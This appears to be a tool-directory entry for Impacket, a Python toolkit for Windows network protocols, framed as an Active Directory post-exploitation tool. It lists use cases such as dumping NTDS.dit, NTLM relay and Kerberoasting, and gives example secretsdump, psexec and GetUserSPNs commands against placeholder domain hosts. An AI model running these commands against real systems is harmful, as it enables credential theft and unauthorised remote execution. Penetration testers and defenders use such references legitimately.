
Impacket

SecureAuth (now Fortra) Python toolkit for low-level Windows network protocols.


// what it is

Description

Pure-Python implementations of SMB, MSRPC, NetBIOS, Kerberos, and DCE/RPC. Its bundled example scripts power most modern AD post-exploitation: `psexec.py`, `secretsdump.py`, `GetUserSPNs.py`, `getTGT.py`, `wmiexec.py`, `ntlmrelayx.py`.

// use cases

What people use it for

  • Remote command execution (PSExec-style)
  • Dumping NTDS.dit from a DC
  • NTLM relay attacks
  • Kerberoasting from Linux

// commands

The commands you'll type

Secretsdump (DC)

$ secretsdump.py corp/admin@dc.corp.local

PSExec

$ psexec.py corp/admin@10.0.0.5

Kerberoast

$ GetUserSPNs.py corp.local/user -dc-ip 10.0.0.1 -request

// facts

  • category: Post-Exploit
  • platforms: LIN · WIN · MAC
  • license: FOSS
  • difficulty: Advanced
